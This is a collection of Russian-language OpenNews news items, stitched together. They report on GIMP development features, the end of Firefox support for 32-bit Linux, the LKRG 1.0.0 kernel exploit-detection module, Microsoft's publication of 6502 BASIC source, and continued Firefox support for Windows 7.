• Добавлена поддержка нового формата кистей, задействованного в программе для цифровой живописи MyPaint 2.0. Движок для работы с кистями MyPaint теперь учитывает масштаб и поворот холста при рисовании, что позволяет более точно симулировать реальные мазки кистью. В состав GIMP добавлено более 20 новых кистей из набора Dieterle, входящего в состав MyPaint Brushes 2, включая кисти для рисования стрелок и постеризации.
• В инструмент для работы с кистями MyPaint добавлен ползунок "Усиление" (Gain), при помощи которого можно управлять реагированием на степень нажатия при рисовании, например, для симуляции более сильного или слабого нажатия на кисть при рисовании мышью.
• В инструменте для создания и редактирования текстовых слоев реализована поддержка комбинаций клавиш "Ctrl + B", "Ctrl + I" и "Ctrl + U" для применения жирного начертания, курсива и подчёркивания. Обеспечено изменение цвета контура текста в реальном времени сразу после изменения цвета в окне выбора цвета, не дожидаясь подтверждения выбора.
• Представлен новый интерфейс плагина Animation Playback, оформленный в стиле видеоплееров, таких как VLC. Вместо индикатора прогресса задействован слайдер, позволяющий переместится на нужный кадр.
• Учтены системные настройки для отключения анимированных эффектов.
• В полях для ввода значений с размером в диалогах настройки сетки и разрешения монитора разрешено использовать математические выражения, например, "3 * 92cm".
• Возобновлена возможность импорта изображений в формате HRZ, применяемого для сохранения данных SSTV.
• Добавлена поддержка импорта изображений в формате JPEG 2000 со знаковым представлением пиксельных данных, которые могут содержать отрицательные значения.
• Добавлена поддержка импорта текстур в формате PAA, применяемом в играх от компании Bohemia Interactive Studio.
• Добавлена поддержка импорта изображений в форматах SFW93A и SFW94A, применявшихся в Seattle Filmwork.
• Расширена поддержка формата TIFF, для которого реализована возможность загрузки данных о видимости слоёв, режимов смешивания и тегов цветов.
• Внесены изменения для упрощения в будущем портирования на GTK4. Например, осуществлён уход от использования GtkTreeView в пользу GtkListBox.
• Налажено формирование ночных сборок в формате snap для архитектур aarch64 и x86_64, а также в формате flatpak для архитектуры aarch64 (для x86_64 сборки формировались и раньше).

Дополнительно можно отметить анонс плагина Dream Prompter, встраивающего в GIMP интерфейс для генерации и редактирования изображений при помощи AI-модели Gemini 2.5 Flash Image Preview на основе определения задания на естественном языке. Код плагина написан на Python и распространяется под лицензией MIT.

1. Главная ссылка к новости
2. OpenNews: Выпуск графического редактора GIMP 3.1.2
3. OpenNews: Уязвимости в GNOME Help и GIMP, позволяющие выполнить код при открытии файлов
4. OpenNews: Обновление графического редактора GIMP 3.0.4
5. OpenNews: Релиз графического редактора GIMP 3.0.0

Пользователям 32-разрядных Linux-дистрибутивов рекомендуется перейти на использование 64-разрядных операционных систем. Для тех, кто не может оперативно обновить дистрибутив можно использовать ESR-ветку Firefox 140, обновления с устранением уязвимостей для которой будут формироваться как минимум до сентября следующего года. В Chrome поддержка 32-разрядных систем Linux была прекращена в 2016 году.

1. Главная ссылка к новости
2. OpenNews: Поддержка Firefox 115 ESR продлена до марта 2026 года
3. OpenNews: Релиз Firefox 142
4. OpenNews: Mozilla China прекращает предоставление сервисов для Firefox в Китае
5. OpenNews: Wayland использует менее 10% Linux-пользователей Firefox
6. OpenNews: Релиз web-браузера Chrome 49, прекративший поддержку 32-разрядных систем Linux

Модуль подходит как для защиты от атак, манипулирующих уже известными узявимостями в ядре Linux, так для противостояния эксплоитам, использующим ещё неизвестные уязвимости, если в них не применяются специальные меры для обхода LKRG. Защита основывается на выявлении несанкционированного внесения изменений в работающее ядро (проверка целостности) и отслеживании изменения полномочий пользовательских процессов (определение применения эксплоитов).

Проверка целостности выполняется на основе сравнения хэшей, вычисляемых для наиболее важных областей памяти и структур данных ядра, таких как IDT (Interrupt Descriptor Table), MSR, таблицы системных вызовов, все процедуры и функции, обработчики прерываний, списки загруженных модулей, содержимое секции ".text" модулей и атрибуты процессов. Процедура проверки активируется периодически по таймеру или при наступлении определённых событий в ядре, например, при выполнении системных вызовов setuid, setreuid, fork, exit, execve и do_init_module.

Определение возможного применения эксплоитов и блокирование атак производится на стадии до предоставления ядром доступа к ресурсам (например, до открытия файла), но после получения процессом несанкционированных полномочий (например, смена UID). При выявлении несанкционированного поведения процессов выполняется их принудительное завершение, чего достаточно для блокирования многих эксплоитов. Накладные расходы от работы модуля оцениваются в 2-2.5%.

Поддерживается работа на системах с архитектурами x86-64, AArch64 (ARM64), ARM32 и x86. Работа LKRG 1.0.0 протестирована с ядрами из различных дистрибутивов, начиная с ядра 3.10 из RHEL/CentOS 7 и заканчивая 6.17-rc4 из репозитория, в котором ведётся подготовка релиза Fedora 44. Пакеты доступны для дистрибутивов ALT Linux, Arch Linux, Astra Linux, Gentoo, Guix, NixOS, Rocky Linux, Whonix, Yocto и OpenBMC. Собранные для Rocky Linux пакеты можно использовать в RHEL 8/9 и производных дистрибутивах, таких как AlmaLinux 8/9, а пакеты для Whonix в Debian и Ubuntu.

Среди изменений в новой версии:

• Обеспечена совместимость с ядрами Linux вплоть до выпуска 6.17-rc4.
• При использовании с ядрами начиная с 6.13 прекращён перехват удалённых вызовов override_creds() и revert_creds(), что ограничило выявление атак, переопределяющих указатель cred. Ограничения попытались компенсировать через добавления проверок перезаписи указателя cred в других местах ядра.
• Прекращено излишнее отслеживание учётных данных для которых не производится проверка целостности. Изменение позволило сократить кодовую базу примерно на 1500 строк.
• Добавлена поддержка появившегося в ядре Linux 6.10 механизма для создания в ФС OverlayFS временных файлов, используя опцию O_TMPFILE (ovl_tmpfile). Указанная поддержка необходима для предотвращения ложных срабатываний, проявляющихся при использовании изолированных контейнеров на системах с ядрами 6.10-6.12.
• Для систем x86_64 добавлена поддержка технологии Intel CET (Control-flow Enforcement Technology) для защиты исполняемого кода с использованием инструкций IBT (indirect branch tracking), а также программной защиты kCFI (kernel Control Flow Integrity) для блокирования нарушения нормального порядка выполнения (control flow) в результате применения эксплоитов, изменяющих хранимые в памяти указатели на функции.
• Для подключения многих обработчиков вместо kretprobes задействован механизм kprobes, упрощающий код установки hook-ов и позволяющий добиться более высокой производительности.
• Переработана работа с блокировками (lock) данных в ядре, специфичных для процесса (per-task shadow data). За счёт исключения лишних блокировок удалось повысить производительность обращения к подобным данным.
• Устранены ошибки, приводившие к состоянию гонки, проблемам с проверкой целостности и ложным срабатываниям.
• Улучшена поддержка сборки с использованием Clang.

1. Главная ссылка к новости
2. OpenNews: Выпуск модуля LKRG 0.9.7 для защиты от эксплуатации уязвимостей в ядре Linux
3. OpenNews: Проект Openwall подготовил модуль для защиты от эксплуатации уязвимостей в ядре Linux
4. OpenNews: Проект OpenPaX развивает аналог механизмов защиты Grsecurity/PaX для ядра Linux
5. OpenNews: Проект по продвижению в ядро Linux новых технологий активной защиты
6. OpenNews: Проект grsecurity опубликовал реализацию механизма защиты RAP для ядра Linux

Это второй продукт компании Microsoft. Первым продуктом был Altair BASIC, код которого был опубликован Биллом Гейтсом весной этого года в честь 50-летия со дня основания компании Microsoft. В 1976 году Билл Гейтс и Рик Вейланд (Ric Weiland) подготовили порт Altair BASIC для микропроцессоров 6502, который был лицензирован компанией Commodore и поставлялся как Commodore BASIC в компьютерах Commodore PET, VIC-20 и Commodore 64.

Код BASIC для 6502 может представлять интерес для любителей ретрокомпьютеров, использующих эмуляторы и реализации на базе FPGA. Среди прочего, компания Commodore анонсировала модель Commodore 64 ULTIMATE на базе FPGA, начало продаж которого намечено на октябрь. В Commodore 64 ULTIMATE заявлена совместимость с более чем 10 тысячами ретро игр при таких возможностях, как передача игр по Wi-Fi, поддержка USB и режим ускорения для запуска новых игр.

1. Главная ссылка к новости
2. OpenNews: Microsoft открыл код GW-BASIC под лицензией MIT
3. OpenNews: Microsoft открыл код Windows Subsystem for Linux и текстового редактора Edit
4. OpenNews: Microsoft открыл код MS-DOS 1.25 и 2.0 под лицензией MIT
5. OpenNews: Microsoft и IBM открыли код операционной системы MS-DOS 4.0
6. OpenNews: Билл Гейтс опубликовал код первого продукта Microsoft

В соответствии cо статистикой Mozilla ощутимое число пользователей Firefox продолжают использование Windows 7, несмотря на прекращение компанией Microsoft сопровождения данных операционных систем с января 2020 года. В Google Chrome поддержка Windows 7 и Windows 8 была прекращена в феврале 2023 года, поэтому Firefox остаётся единственным значительным браузером с поддержкой Windows 7/8.

1. Главная ссылка к новости
2. OpenNews: Поддержка Firefox 115 ESR продлена до сентября 2025 года. Обновление Firefox 135.0.1
3. OpenNews: Mozilla продлила поддержку ESR-ветки Firefox 115 до марта 2025 года
4. OpenNews: Релиз Firefox 115
5. OpenNews: Релиз Firefox 140
6. OpenNews: Релиз Firefox 142